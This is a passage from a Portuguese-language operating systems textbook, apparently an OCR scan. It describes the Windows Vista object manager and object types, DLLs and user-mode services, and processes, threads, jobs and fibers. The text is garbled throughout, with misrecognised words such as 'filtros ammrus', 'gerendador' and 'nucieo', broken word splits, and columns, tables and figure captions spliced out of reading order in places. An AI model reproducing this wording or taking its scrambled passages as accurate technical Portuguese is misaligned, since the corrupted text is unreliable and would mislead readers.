dispositiyo encontrado pelo gerenciador de objetos. 

5. O IRP pcrcorre a pilha de E/S aie alcanęar um obję¬ 
to de dispositivo representando a instanria do siste- 
ma de arquivos para C . Em cada estagio, o com role 
e passado para um ponto de entrada para o objęto 
dc dispositivo assodado ao objęto de driver daqude 
mvel. O ponto de cm rada usado nesse caso e para 
operaęoes do tipo CREATE, uma vez que a solidla- 
ęao e para criar ou abrir um arquivo nomeado \foo\ 
bar no volumc, 

6 . Os objetos de dispositivos encontrados na medida 
em que o IRP caminha para o si stema de arquivos 
representam drivers de (ikro de sisiema de arqui- 
vo$, que podcm modifkar a operaęao de E/S ant es 
que cheguc ao objęto de dispositivo do sistema dc 
arquivos. De maneira usual, esses disposiiivos inter¬ 
media rios representam extensóes de sistema como 
filtros ammrus. 

7. O objęto de dispositiyo do sistema de arquivos tem 
uma ligaęao para o objęto de driver do sistema de 


CreateFile (C:\foo\bar) do Win3£ 
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I Figura 11.11 Etapas dos gerenciadores de E/S e objetos para criar/abrir um arquivo e obter um descritor de arquivo. 
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arqmvos, digamos o NTFS, Logo, o objęto de driver 
contem o endereęo da operaęao CREATE no NTFS, 

8. O NTFS vai prccncber o objęto de arquivo e dc- 
volve-lo para o gerendador dc E/S, que passa no- 
vamente por todos os dispositivos da pilha ate que 
o lopParseDevice retom e ao gerendador de obje los 
(vcja a Seęao 11.8), 

9. O gerendador dc objetos tennina sua procura no 
cspaęo de nomes. Ele recebcu de volta itm objęto 
inicializado da rotina Farsę {que, nesse caso, e um 
objęto de arquivo — nao o objęto de dispositivo 
original quc ele encontrou), Logo, o gerendador de 
objetos ci ia um descritor para o objęto dc arquivo 
na tabela de descritores do processo eni curso e re- 
torna o descritor para o chamador. 

10 . A ultima etapa e voliar ao chamador no modo usua- 
rio, que nesse exemplo c a AP1 do Win32 CreateRle 
que vai dcvolver o descritor para a aplicaęao. 

Os componentes do executivo podem criar novos tipos 
de forma dimmica, chamandoa interface ObCreateGbjectType 
para o gerendador de objetos, Nao ha uma lista defmitiva 
de tipos de objetos e des mu dam de Langa niemo para lam 
ęamento. Mguns dos mais comuns no Windows Vista sao 
listados na Tabela 11,12, Vamos pcrcorrcr brevcmentc os 
tipos de objęto na tabela. 
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Os tipos processo e thread sao óbvios. Ha um objęto 
para ca da processo e cada thread, que contem as princi- 
pais propriedades ncccssańas para gercnciar o processo 
ou o thread. Os tres objetos seguintes, semaforo, mutex 
e evento, todos li dam com sincronizaęao entre processos. 
Os semafor os c mutcxes funcionam como esperado, mas 
com muitas caracteristicas extras {por exemp]o, valores 
maximos e tempos de finalizaęao). Os eventos podem es- 
tar cm um de dois estados: smali zado o u nao sinalizado. Se 
um thread espera por um evento quc esta sinalizado, ele 
e libera do imediaiamenie; se o evento esta ern esta do nao 
sinalizado, ele bloqueia a te que algum outro thread sina- 
llzc o evemo, o que libera ou todos os ihreads bloąueados 
(eventos de notificaęao) ou apenas o primeiro thread bio- 
queado (eventos de sincronizaęao). Um evento tambem 
pode ser configurado de modo que, após um sinal ter sido 
esperado com sucesso, ele se reverta, de maneira automa- 
tica, para o estado de nao sinalizado, eni vez de permane- 
cer no estado sinalizado. 

Os objetos de porta, temporizador e fila tambem esiao 
relacionados com comunicaęao e sincronizaęao. As portas 
sao canais entre os processos para a troca de mensagens 
LPC Os lemporizadores fornecem um modo de bloąueio 
por urn imcrvalo de tempo espeeffko. As 11 las sao tisadas 
para notificar os threads de que uma operaęao assmerona 
dc E/S iiiicializada anteriormente terininou ou dc quc unia 


Ttpo 

Descrięao 

Processo 

Processo do usuśrio 

Thread 

Thread dentro de um processo 

Semaforo 

Semaforo contador usado para sincronizaęao entre processos 

Mutex 

Semaforo binarto usado para entrar ern uma regiao critica 

Even1o 

Objęto efe sincronizaęao com estado persistente (sinalizado/nao) 

Porta de ALPC 

Mecanismo cteenvio de mensagem entre processos 

Temporizador 

Objęto que permite um thread adormecer por um intervalo de tempo ffxo 

Fita 

Objęto usado para notificar a conclusao de E/S assinerona 

Arquivo aberto 

Objęto assoefado a um arquivo aberto 

Token de acesso 

tdentificadorde seguranęa para algum objęto 

Ferfil 

Estrutura de dados usada na criaęao de perfis de uso da CPU 

Seęao 

Objęto usado para representar arquivos mapeaveis 

Chave 

Chave de regislro, usada para ligar o registro ao espaęo de nomes do gerendador de objetos 

Diretório de objęto 

Diretório para agrupar os objetos dentro do gerendador de objetos 

Ugaęao simbólica 

Refere-se a outro objęto do gerendador de objetos por nome de caminho 

DiSpOSitivo 

Objęto de di$positivo de E/S para um dispositivo fisico, barramento ou inst&ncia de voiurme 

Driver de dispositivo 

Cada driver de dis posili vo carregado tem seu próprio objęto 


I Tabela 11.12 Alguns tipos comuns de objetos gerenciados pelo gerendador de objetos. 
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porta tein uma mensagem esperando. (Eias sao projetadas 
para gerenciar os nfreis de concorrencia em uma aplicaęao 
e sao usadas em aplicaęoes de multiprocessadores de alto 
desempenho, como SQL.) 

Objetos de arquivo aberto sao criados quando um ar- 
quivo e aberto. Arquivos que na o estao a bert os nao tem 
objetos gerenciados pelo gerenciador de objetos. Tokens 
de acesso sao objetos de seguranęa; eles idemificam um 
usuario e dizem quais prmiegios espetiais o usuario pos- 
sui (se possui). Pcrfis sao estruturas usadas para arma- 
zenar amostras periódicas do contador de programas de 
um thread em execuęao para saberondc o programa esta 
gasłarido scu tempo. 

Seęóes sao usadas para represema r objetos de mcmó- 
ria que as aplicaęoes podem pedir a o gerenciador de me- 
mória para serem mapcadas em scu espaęo de endercęa- 
menio. Elas gravam a scęao do arquivo (ou arquivo de 
paglna) que represema as paginas do objęto de memória 
quando elas estao no disco. As chaves represemam o porno 
de inontagem para o espaęo de nomes do regtstro no espa¬ 
ęo de nomes do gerenciador de objetos. Ha, normalnienie, 
apenas um objęto-cha ve, cha mado \REGISTRY, que conec- 
la os nomes das chaves do registro e os valores ao espaęo 
de nomes do NT* 

Direiórios de objęto e ligaęoes simbólicas sao locais a 
parte do espaęo de nomes do NT gerenciada pelo geren¬ 
ciador de objetos. Eles sao similares aos sens homologos 
dc sistema de arquivos; os direiórios pennitem aos objetos 
i c la donn d os se rem recolh i dos j u ntos; I iga ęócs s im b ó li ca s 
permitem a um nonie cm unia parte do espaęo dc nomes 
do objęto rcferenciar um objęto em uma parte difcrcnlc do 
espaęo de nomes do objęto. 

Cada dispositivo conhecido pelo sistema operacional 
tem um ou mais objetos de dispositivos que cantem infor- 
niaęócs sobrc eles c sao usados pelo sistema para referen¬ 
da r um dispositiyo, Fuialmente, cada driver dc dispositivo 
quc ten ha sido carregado tem um objęto de driver no espa¬ 
ęo dc objetos. Os objetos de driver sao compariilliados por 
todos os objetos de dispositivos que representam instancias 
dos dispositivos controlados por aqueles drivers. 

Outros objetos, nao Iistados, tein propósitos mais es- 
pccializados, como interagir com transaęoes dc nucleo, 
ou a la ln ica dc tlircads opera rios do lanąue de threads 
do Win32. 

11.5,41 Subsisteifias, DLLs e servięos do 
modo usuario 

Voltando a Figura 11.2, vcmos quc o sistema opcra¬ 
don a I Windows Vista consistc cm componentes no modo 
nucleo c componentes no modo usuario. Complctamos, 
assim, nossa visao gcral dos componentes do modo nucleo; 
logo, e hora de olhar para os componentes do modo usua- 
rio, dos quais ha tres tipos quc sao importantes para o Win¬ 


dows de maneira siiigular: subsistemas de ambiente, DLLs 
e processos de servięo. 

Ja descrevemos o model o de subsistemas do Windows; 
nao entraremos em mais detalhes alem de mendonar 
que, no projeto odginał do NT, os subsistemas eram vis- 
tos como uma maneira de dar su porte a varias persona- 
lidades de sistemas operadonais com o tnesmo software 
de fundamenta sendo executado no modo nucleo. lalvcz 
cssa tenha sido urna tentativa de cvitar que os sistemas 
operadonais competissem pela niesma plataforma, como 
o VMS co Berkeley UN1X fizeram no VAX da DEC; ou 
talvez ninguem na Microsoft soubesse se o OS/2 teria su- 
ccsso como unia intcrfacc dc programaęao, c cntao esta- 
vam protegendo su as apostas. Em qualquer dos casos, o 
OS/2 tornou-se irrdevante e um retardatario, e a A PI do 
Win32, projetada para sercompanilhada com o Windows 95, 
virou dominantę. 

Um segundo aspecto-chavc do projeto do modo usua- 
rio do Windows e a bibliotece dc ligaęao di na mi ca (DLL), 
quc ć código sendo ligado a programas cxccutaveis cm 
tempo reai cm vez dc tempo de compilaęao* As bibliotecas 
compai tilhadas nao sao um conceito novo c a maior parte 
dos sistemas operadonais modemos as utiliza, No Windows, 
quase todas as bibliotecas sao DLLs, desde a biblioteca de 
sistema ntdlLdll, que e carregada em todo processo, a te as 
bibliotecas de alto nfvel de funęóes coniuns que se desti- 
nam a permitir a reutilizaęao de código por desenvolyedo- 
res de aplicaęoes. 

As DLLs aumemam a efidencia do sistema permitindo 
que código conium seja compartilliado enire processos, re- 
duzem os Lempos de carregamento dos programas do disco 
mantendo na memória os códigos usados com frequencia 
eaumentam a capacidade de manutenęao do sistema, pen 
mitindo que o código de bibliotecas do sistema operacional 
seja atuaiizado sem ter de recompilar ou religar todos os 
programas quc o utilizem. 

Por outro lado, bibliotecas compartilhadas apresemam 
o problema de versionamento e aumemam a complexi- 
dade do sistema porque mudanęas introduzidas em uma 
biblioteca compartilhada para aj udar um programa em par- 
ticular tem o potendal de expor erros latentes em outras 
aplicaęoes, ou apenas quebra-las em viriude das mudan¬ 
ęas na implemeniaęao — um problema qvie, no mundo do 
Windows, ć referido como inferno da DLL. 

A implememaęao das DLLs e simples no conceito. No 
lugar de o compilador emitir código que chama, de forma 
direta, sub-rotinas na mesnia imagem dc executaveb um 
nivel de indireęao e introduzido: a 1AT (tabela de ende- 
reęos de importaęao — importaddrmkible). Quando um 
cxccutavcl e carregado, pesqiusa-se licie sobre a lista dc 
DLLs que tambem tem de ser carrcgadas (em gcral um gra- 
fo, ja quc as DLLs Usta das gcral mentc lista m outras DLLs 
necessarias para sua cxecuęao). As DLLs solidtadas sao car- 
regadas e a IAT e preenchida para todas. 
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A realidade e mais complicada. Outro problema e que 
osgrafos que represeniam as relaęoes entre as DLLs podem 
center ciclos ou ter comportamentos nao determimsticos; 
logo, a computaęao da lista de DLLs para carrcgar pode ro¬ 
so Itar em uma seąuenda que nao funcione. AJem disso, 
no Windows as bibliotccas DLL sao autoiizadas a executar 
códigos semprc quc sao carrcgadas para um processo, ou 
ąuando um novo thread e eriado. De modo geral, isso e 
para que elas possani realizar a micializaęao, ou alocar ar- 
mazenamento para cada thread, mas tnuitas DLLs realizam 
muitos calculos nessas rodnas de amxaęao. Se qualquer 
inna das funęoes cbamadas em uma rotina de amxaędo pre- 
cisar examlnar a lista de DLLs carregadas, um impasse pode 
ocorrer prendendo o processo. 

As DLLs sao usadas para mais do que apenas compar- 
tilhar códigos coimtns. Hlas habiliiam um modelo de hospe- 
dagrn para esteuder as aplicaęoes. O Internet Hxplorer pode 
descarregare se ligara DLLs cbamadas controles ActiveX. 
Na ouira ponta da Internet, servidores da Web tambem car- 
regam cod i go dl na mi co para produzir uma experiencia Web 
me!hor para as paginas que eles exibem. Aplicaęoes como o 
iMicrosoft Office sao ligadas e execulam DLLs para permitir 
quc o Office seja usado como uma plataforma para a cons- 
truęao dc outras aplicaęoes, O estilo dc programaęao COM 
{modelo dc objęto coinponcnte — component objecł modd) 
permite aos pi ogra mas encontrar e carrcgar, de modo di na- 
mico, código escrito para fornecer uma intcrface publicada 
esperifica, que lcva a hospedagem de DLLs em processos 
por quase todas as aplicaęoes qtie usatn COM. 

Todo esse carrcgamento dinamico dc código resultou 
em uma comp!cxidadc ainda maior para o sistema opera- 
cional ja quc o gcrcnciamcnto dc versocs dc biblioteca nao 
e apenas um problema de combi nar um execulavel com 
as yersoes certas das DLLs, mas em alguns casos carrcgar 
varias versóes da mesma DLL para um processo — o que a 
Microsoft chama de lado a lado. Um imico prograina pode 
hospodar duas bibliotccas de códigos dtnamicas diferentes, 
e cada uma pode qnerer carrcgar a mesma biblioteca do 
Windows — mas ter reąuisitos de yersoes diferentes para 
essa biblioteca, 

Uma soluęao melhor seria hospodar código em proces¬ 
sos sępa rad os, mas a hospedagem de código fora dos pro- 
cossos resulia em desempenho mais baixo c implica modc- 
Ios de programaęao mais compiicados em muitos casos. A 
Microsoft ainda tern de desenvolver urna boa soluęao para 
loda essa coniplexidade no modo usuario, Isso faz com que 
alguem anseic pela relativa simplicidadc do modo nuclco. 

Uma das razoes para o modo nuclco ter men os 
complexidade que o modo usuario e que de da supor- 
te a poticas oportunidades de extensao fora do mode¬ 
lo do driver de dlspositivo. No Windows, a funcionali- 
dade do sistema e estendida escievendo-se semęos do 
modo usuario. isso funcionou bem para os subsistemas 
c funclona ainda melhor ąuando apenas poucos semęos 
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novos estao sendo oferecidos, a o comrarlo de uma com- 
pleta personalidade de sistema operacional. Ha poucas 
diferenęas funcionais entre os servięos implementados 
no nucieo e os servięos implementados nos processos do 
modo usuario. Tamo o nuclco quanto os processos ofcrc- 
ccm cspaęos dc endereęamento privados on dc as estru- 
tu ras dc da dos podcm ser protegidas c as solieitaęócs dc 
servięos podem ser examinadas. 

Entretanto, pode haver diferenęas significativas de de¬ 
sempenho entre os seryięos no nucieo contra os servlęos 
nos processos do modo usuario. Emrar no nuclco a partir 
do modo usuario e lento nos hardwares modernos, mas 
nao tao lento quanto ter dc fazc-lo duas vczcs porque sc 
esta trocando c dcstrocando para outro processo, Alcm dis- 
so, a comunicaęao atraves dos processos tem uma largura 
de banda me nor, 

O código no modo nucieo pode (com multa cuidado) 
acessar dados nos endereęos do modo usuario passados como 
parametros para su as cbamadas dc sistema. Com os scrvięos 
do modo usuario, esses dados dcvcm ou ser copiados para o 
processo do servięo, ou dcvc-sc rcalizar um jogo dc mapca- 
mento da memóna para la c para ca (os recursos dc AL PC no 
Windows Yisia tratam disso por baixo dos panos), 

Ć possfveI que r no futuro, os custos dc hardware do 
cruzamento entre espaęos de endereęamento e modos de 
protcęao seja ni reduzidos, ou ialvcz atć se tomem irrde- 
vantcs t 0 projeto Singularidadc cm Microsoft Research 
(Fandrich ct aL, 2006) usa tćcnicas de tempo dc cxecuęao, 
como as utilizadas cm C# e Java, para lornar a proteęao 
uma ąuestao exclusiva de software. Nao sao necessarias 
trocas de hardware cjure espaęos de endereęamento ou 
modos de proteęao. 

O Windows Vista faz uso significativo dc processos de 
servięos do modo usuario para estender a fundo na lid a de do 
sistema. Alguns d esses servięos sao fortemente li gad os ao 
firn ci ona men to dos componentes do modo nucieo, como 
o lsass.exe, que e o servięo de autemicaęao de s egu ranę a 
local, que gerenda os objetos de loken que representam a 
identidade do usuario, bem como gerenda as chaves de co- 
dificaęao usadaspeio sistema de arquivos, O gerenciador de 
recursos pronto para usar do modo usuario e responsavei 
por de termin ar o driver correto a ser utilizado ąuando um 
novo dispositho de hardware e e neon trądu, instala-lo, e 
dizer ao miclco para carrcga-io. Muitos recursos ofereddos 
por terceiros, como antivirus c gerenciador dc dircitos digi- 
tais, sao implementados como uma combinaęao dc drivers 
do modo nucieo e servięos do modo usuario. 

No Windows Yista, o taskmgr.exe tem uma a ba que 
idemifica os servięos sendo executados no sistema. {Yersoes 
anteriores do Windows exibem uma lista dos servięos com 
o comando net start) Yarios servięos podcm ser visios exe- 
cutando no mesmo processo (svchost.exe). O Windows 
faz isso para muitos dc sens prćprios servięos dc iniciatiza- 
ęao para reduzir o tempo necessario para inicializar o sistc- 
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ma. Os servięos podem ser combinados no mesmo processo 
desde que possani operar de maneira segura com as nies- 
mas er eden da is dc seguranęa. 

Dcntro dc oda um dos processos compartilhados dc 
servięo, scmęos individuais sao carregados como DLLs, 
El es, de modo geral, dmdetn um tanque de threads usan- 
do o reeurso de tanque de threads do Win32, de modo que 
apenas um nu mero mfnimo dc threads predse ficar sendo 
execuiado por todos os semęos residentes. 

Os servięos sao fontes comuns de vulnerabilidades dc 
segutanęa no sistema porque sao, de modo geral, atessi- 
veis rerno La menie (dcpendendo do DrewaII do TCP/IP e 
configu raęoes de seguranęa dc IP), c nem todos os pro- 
gra madorcs quc escrcvcm scrvięos sao cuidadosos como 
dcvcriam para validar os parametros e buffers que sao pas- 
sados pelas RPCs. 

O nu mero de scrvięo$ sendo executados de maneira 
constante no Windows e impressionante. No emanto, al- 
guns desses servięos nunca recebem urna linka solicitaęao 
e, quando o fazem, c provavel que scja dc um atacante ten- 
tando explorar urna Yulncrabilidadc. Como rcsultado, mais 
e mais servięos no Windows sao dcsatirados por pa dra o, 
em espcctal nas versoes do Windows Server. 


11.4 


Processos e threads no 
Windows Vista 


O Windows tein urna serie de conceilos para gerendar 
a CPU e agrupar os recursos. Nas proxinias seęoes exami- 
naremos csscs conccitos, disattindo algumas das chamadas 
relcvantcs da API do Win32, e aprcsentaremos como sao 
implementados. 


o comem. Eles tambem podem ter afinidade para serem 
executados apenas em certos processadores, o que aj uda 
programas concorrentes sendo execuiados em niultipro- 
cessadoresa distribuir de forma exp!iciia um trabalho. Cada 
thread tem duas pil ha s sęparada$ de chamadas, u ma para 
execuęao no modo usuario e outra para o modo nucleo; 
ha tambem um TEB fbloco de ambiente de thread — 
thread environmenl błock) que mantem os da dos do modo 
usuario especificos ao thread, induindo armazenamenlo 
por thread [armazenameiito local de thread — thread 
łocal stonuje) e campos para o Win32, linguagem e locałi- 
zaęao cultural, e outros campos especializados que foram 
adkionados por varios outros recursos. 

Alem dos PEBs e TEBs, ha unia outra estru tura de da- 
dos que o modo nucleo compartilha com cada processo, 
cha mada de dados compartilha dos do usuario. Ela e 
unia pagina quc pode serescrila pclonucleo, maść somen- 
te lei tura cm todo processo do modo usuario e comem u ma 
serie de valores mantidos pelo nucleo, como varias formas 
de tempo, informaęao de versao, quantklade de memória 
fisi ca e mui Los sinaiizadores compartilha dos usadas por 
inumeros componentes do modo usuario, como COM, 
servięos de terminal e depuradores. 0 uso dessa pagina 
somenle leitura ć apenas um aperfeięoamcmo de deseni- 
pen ho, ja qne os valores tambem poderiam ser oblidos por 
uma chamada de sistema para o modo usuario, mas as cha¬ 
madas de sistema sao umil o mais earas que um unico aces- 
so de memória, logo, para alguns campos mantidos pelo 
sistema, como a hora, faz inuiLo senlido. Os outros campos, 
como a area de tempo atual nao mu dam com frcąuenria, 
mas o código que reside nesses campos deve pesąuisar ne- 
les algumas vezes apenas para ver se eles mudarann 


11.4.11 Conceitos fundamenta)* 

No Windows Yista os processos sao cońtentores para 
programas. Eles detem o espaęo de endereęamento virtiiai, 
os manipuladores que fazem referenda aos objeios do 
modo mielec, e os threads. Em seu papel de contciuores dc 
threads, des detem recursos comuns usados para execu- 
ęao dc threads, como o ponteiro para a estrutura de cota, 
o objęto dc lokcn compartilhado e parametros-padrao 
usados para inicializar os threads — induindo a classe 
de escalonameuto e prioridade. Cada processo tern da¬ 
dos dc sistema do modo usuario, diamados PEB (bio¬ 
to do ambiente do processo — process envimment 
błock), O PEB ind u i a lista de mód u los carregados (ou 
seja, o EXE e as DLLs), a memória contendo cadeias de 
caractercs de ambiente, o diretório de funcionamcn- 
to atual c os dados para gerendar os momes dos proces¬ 
sos — assim como varios casos espeeiais de códigos inuteis 
do Win32 que foram adidonados ao longo do tempo. 

Os threads sao a abstraęao do nucleo para escalonar 
a CPU no Windows. Prioridades sao atribuidas para cada 
thread com basc no valor da prioridade no processo que 


Processos 

Os processos sao criados por objetos de se^ao, cada 
um dos quais descreve um objeto dc memória apoiado 
em om arquivo no disco, Quando um processo ć criado, 
o processo criador rcccbe um dcserilor para csse proces¬ 
so que lhe per mi te modifica-lo mapę a udo seęoes, alo- 
cando memória virtual, gravando parametros e dados de 
ambiente, duplicando idcntificadorcs de arquivo em sna 
tabela dc dcscritores c criando threads, łsto ć mihto dile- 
rente de como os processos sao criados no UNIX e reflele 
a diferenęa entre os sisiemas pretendidos nos projetos ori- 
ginais do UN1X versus Windows. 

Como dcscrito na Scęao 1LL o UN1X foi projetado 
para sistemas dc apenas um processa dor de ló bits quc usa- 
va troca para comparlilhar a memória entre os processos. 
Em lais sistemas, ter o processo como a unklade de concor- 
renria e usar uma operaęao como a fork para criar processos 
era uma ideia brilhante. Para executar um novo processo 
com pouca memória e nenhum hardware de memória vir- 
tual, os processos na memória tern de ser trocados no disco 
para criar espaęo. O UNIX implementou a fork, no infcio. 
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apenas troca ndo os processos pais e passa udo sua memória 
fisica para os filhos. A operaęao era quase gratuita. 

Hm eon na sic, o ambicnle dc hardware no moment o 
cm que a equipe de Cutlcr escrcveu o NT cram sistemas 
miiltiprocessados de 32 bits com hardware de memória 
virtual para com pa ri i Ilia r 1-16 MB de memória fisi ca. Os 
mulliprocessadores oferecem a oporu:nidade de execmar 
paries de programas de forma conconente, eniao o NT usa- 
va processos como eon tent ores para compartilliar memória 
e recursos de objęto e iuilizava threads como a n ni da de de 
concorrenda para o cscalonamcnto. 

Logicameme, os sistemas deniro de poucos anos 
nao vao trtais parecer em nada com nenhum desses dois 
ambientes, lendo cspaęos dc cndereęamcnto dc 64 bits 
com duzias (ou centenas) de nucleos de CPU por cada 
soąuete dc chip c imiitos GB de memória fisica — bem 
como dispositivos flash e outros armazenamentos nao 
volateis adicionados a hierarąuia de memória, su porte 
mais amplo a virlualizaęao, red es onipresemes e su por¬ 
te para inovaęoes de sincronizaęlo, como memória tran- 
sacional. O Windows e o UNIX continuarao a ser adapta- 
dos a novas realidades de hardware, mas o que sera mes- 
mo micressantc e vcr quai$ novos sistemas operacionais 
sao projetados de forma espedfica para sistemas baseados 
nesses avanęos* 

Tarefas e filamentos 

O Windows pode agrupar processos em tarefas, mas a 
abstraęao de tarefa nao e irniito generica. Hla foi projeiada 
de forma espeeffica para agrupar processos com o objetivo de 
aplicar restrięoes aos threads que eles contem, como limitar 
o uso dc recursos por nudo dc cota com partii bada ou apli¬ 
car uma token restrita quc impede quc os threads acesscm 
muitos objetos dc sistema. A propriedadc mais significativa 
das tarefas para o gerenriamento de recursos e que, nma 
vczque um processo esleja em uma tarefa, todos os threads 
dos processos que esse processo cria lambem estarao na 
tarefa. Nao ha como fugir. Como indkado pelo nonie, as 
tarefas foram projetadas para sUuaęóes que sao mais como 
edar lotes de processa men to do que uma interaęao compu- 
tactonaJ comum. 
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Urn processo pode estar (no maximo) em uma tarefa. 
Isso faz sentido, ja que o significado de um processo sujeito a 
multiplas cotas compartilhadas ou tokens restritas e diffdl de 
definir. Entretanto, isso significa que, se muitos servięos no 
sisteina tent a m usar tarefas para gerendar os processos, ha- 
vcra conflitos se eles tentarem gerendar os mesmos proces¬ 
sos. Por excmplo, uma ferramenta administrativa que pre- 
tendesse compelir o uso dc recursos colocando processos em 
tarefas seria trust rad a se o processo primeiro se inserisse na 
própria tarefa ou se uma ferramenta de seguranęa ja tivesse 
posto o processo em uma tarefa com uma token restrita para 
limitar seu acesso aos objetos do sisteina. Como resukado, o 
uso de tarefas no Windows e raro. 

A Figura 11.12 apresenta o reladonamento entre ta¬ 
refas, processos, threads e li lament os. As tarefas contem 
processos; processos contem threads, mas os threads nao 
contem filainentos. O relacionaniemo de threads com fila- 
menios e, de modo geral, de muitos para mititos. 

Os filamcntos sao criados alocando-se uma pilha e 
uma estru tura dc dados dc filamento do modo usuario 
para armazćnar registradores c dados associados com o fi¬ 
la men to. Os threads sao comerlidos em fi lament os, mas 
esies podem tambem ser criados de modo independente 
dos threads* Esses fila mętu os nao serao execuiados ale 
que um filamento que ja esleja sendo executado em um 
thread chanie, de forma explfdta, SwitchToFiber para execu- 
tar o filamento. Os threads poderiam tentar trocar para um 
filamento que ja esteja sendo execmado, logo o programa- 
dor deve fornecer sincronizaęao para impedir isso. 

A vantagem primaria dos filainentos e que o custo 
adicional da troca entre filainentos e muito r muito mais 
baixo que o da troca entre threads. Uma troca de thread 
requer entrada e safda no micie o. Uma troca de filamento 
grava e recupera alguns registradores sem qualquer mu- 
danęa de modos, 

Ainda que os filamentos sejarn escalonados de for¬ 
ma cooperativa, se ha muitos threads escalonaiido os fila¬ 
mentos, mu i ta sincronizaęao cautelosa e necessaria para 
assegurar que os filamentos nao imerfiram mis nos ou¬ 
tros. Para simplificar a interaęao entre threads e filamen¬ 
tos, e uli! mar apenas tamos threads quantos forem os 
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I Figura i 1*12 O relacionamento entre tanefas 1 processos, thneads e filamentos, Tarełas e filamentos sao opcionais; nem todos os 
processos estao em tarefas ou contem filamentos. 
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processadores para execma-los e configurar a afinidade 
dos threads para que cada urn seja executado apenas em 
um conjunto especlfico de processadores disponweis, ou 
ate mesmo cm apenas um processador. 

Cada thread pode, entao, executar um subconjunto 
particular de filamentos, eslabelccendo um rdacionamer¬ 
lo um para m.uitos eritre oś threads e filamemos, o que 
simplifica a śincronizaęao, Mesmo assim, ainda ha muitas 
dificuldades com os fi lament os. A maioria das bibliotecas 
do Win32 os desconhece, e as apłicaęocs que tentam utili- 
za-los como sc fosscm threads cncomrarao muitas falhas. 
0 nucleo nao tcm conhccimcnto dos filnmenlos e, quando 
um ciura no nudeo, o thread cm que esta sendo cxcaila¬ 
do pode bloąuear e o nucleo vai escalonar um thread ar- 
bilrario para o processador, tornando-o indispoiuvel para 
exccutar outros filamentos* Por essas razoes os filamentos 
sao po u co u sad os, exceto quando se transporta co di go para 
outros sistemas que predsem de forma expltcita das funcio- 
nalidades oferecidas por des. Um resunio dessas abstraęoes 
e apresentado na Tabela 11.13* 

Threads 

Cada processo normalnienie inicializa com um thread, 
mas novos threads podem ser criados de maneira dinami- 
ca* Os threads formam a base do escalonamento de CPU, 
ja quc o sistema opera cional sempre sdcciona um thread 
para ser executado, e nao um processo* Como conseąuen- 
cia, todo thread tcm um e sta do (pronto, em execuęao, blo- 
qucado etc.), a o passo quc os proccssos nao tcm estados dc 
escalonamento. Os threads podem ser criados dc maneira 
di na inica por u ma cha mada do Win 32 que cspccifica o en- 
dereęo dentro do espaęo de endereęamenlo do processo em 
que elc inirializara sua execuęao. 

Cada thread tein um idcntihcador, que c obtido do 
mesmo cspaęo quc os identificadorcs de processo; logo, um 
unico TD nunca pode estar em uso para um processo e 
u m thread a o mesmo tempo. Os identificadorcs dc thread 
e processo sao mulliplos de quatro porque sao, na verdade, 
alocados pelo executivo nsando urna tabela de manipulado- 
res especial posta a parte para a alocaęao de lDs. O sistema 
esta reutilizando o mecan istno escalavel de gereneiamento 
de descritores exibida nas figuras 11.9 e 11.10. A tabela de 
manipuladores nao tętn refereneias em objetos, mas usa o 
campo de ponteiros para a pontar para um processo ou thread 


para que a pesquisa de um ou omro por ID seja bastame efi- 
ciente. A ordenaęao FIFO da lista de descritores Iivres e ati- 
vada para a tabela de IDs em versoes recentcs do Windows, 
para que os IDs nao sejam reutilizados de imediato. Os 
problemas com a reutilizaęao Imediata sao explorados nas 
ąuestoes ao finał desie capttulo. 

Um thread normalmeme e exeeutado no modo usu- 
ario, mas quando ełe faz unia chamada de sistema, muda 
para o modo nucleo e continua a ser executado como o 
mesmo thread com as inesmas propriedades e limites que 
tinha no modo usuario. Cada thread tcm duas pilhas, urna 
para usar ąuando esta em modo usuario c outra para usar 
quando esta no modo nucleo. Sempre que um thread 
entra no nucleo, cle muda para a pil ha do modo nucleo* 
Os vałores dos registros do modo usuario sao salvos em 
urna esirutura de dados CONTEXT na base da pilha do 
modo nucleo* Como a unica forma de um thread de modo 
usuario nao estar sendo exeauado e entrar no nucleo, a 
CONTEXT de um thread sempre contem sen estado regis- 
trado quando nao esta sendo executado. A CONTEXT para 
cada thread pode ser examinada e modificada por qualquer 
processo com um descritor para o thread. 

Os threads normalnienie sao execmados usando a 
token de acesso do processo que o comeni, mas, em ab 
guns casos relacionados, a computaęao diente/servidor, um 
thread sendo executado em um processo de servięo pode 
personificarseu ciiente, usando urna token de acesso tempo- 
rario baseada na token do ciiente para que ele possa realizar 
operaęócs no nome do ciiente. (Em geral, um servięo nao 
pode usar a token ycrdadcira do ciiente, ja quc o ciiente e o 
semdor podem estar cxccutando cm sistemas diferentes.) 

Os threads tambem sao o ponto Focal norma! para E/S. 
Eles bloqiieiam quando realizam E/S smerona e os pacotes 
de solicitaęao de E/S pendent es para E/S assmerona sao li- 
gados a eles. Quando um thread termina sua execuęao, de 
pode sair, Quaisquer solidtaędes de E/S pendentes para o 
thread scrao ca n cela das e, quando o ultimo thread ainda 
ativo cm um processo sai, o processo finaliza* 

Ć importante perceber que os threads sao um conceito 
de escalonamento, nao um conceito de posse de recurso. 
Qiialquer thread e capaz de acessar todos os objetos qtie 
penencern a seu processo. Tndo o que se tem de fazer e usar 
um valor de manipulador e fazer a chamada Win32 apro- 
priada. Nao ha restrięoes nos threads de que nao possam 


Nome 

Descrięao 

Notas 

Tarefa 

Coleęao de processos que dividem cotas e limites 

Pouco usado 

Processo 

Contentor para a detenęao de recursos 


Thread 

Entidade escalonada polo nuciao 


Filamento 

Thread !eve gerenciado inteiramente no espaęo do usuario 

Pouco usado 


Tabela 1 1.1 3- Concęitos basicos utilizados para o gereneiamento da CPU e dos reoursos. 
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acessar um objęto porąue outro thread o criou ou abriu. O 
sistema nem mesmo mantem registro de qual thread tenha 
criado qual objęto. Urna vez que o manipulador do objęto 
tenha sido colocado na tabela de manipulador es do proces¬ 
so, qualquer thread no processo pode usa-!o, mesmo que 
ostoja personificaodo outro usuario. 

Como descrito antcs, a lem dos threads norm ais que 
sao execuLados nos processos do usuario, o Windows tcm 
urna serie de threads de sistema que sao executados apenas 
no modo tui cle o e na o sao assoriados a qua1quer processo 
do usuario. Todos esses threads dc sistema sao exccutados 
em um processo espccial chama do processo de sistema. 
Esse processo nao tcm espaęo dc endereęamcmo no modo 
usuario* Ele fomece o ambiente no qual os threads sao 
executados ąuaiido nao estao operando em nome de um 
proces so es p cciii co do mod o u su a ii o. Est u da re m os a I g u ns 
desses threads posieriormeme, ąuando chegarmos ao gc- 
renciamento de memória. Aiguns realizam larefas adminis- 
trativas, como escrever paginas sujas para o disco, enquanto 
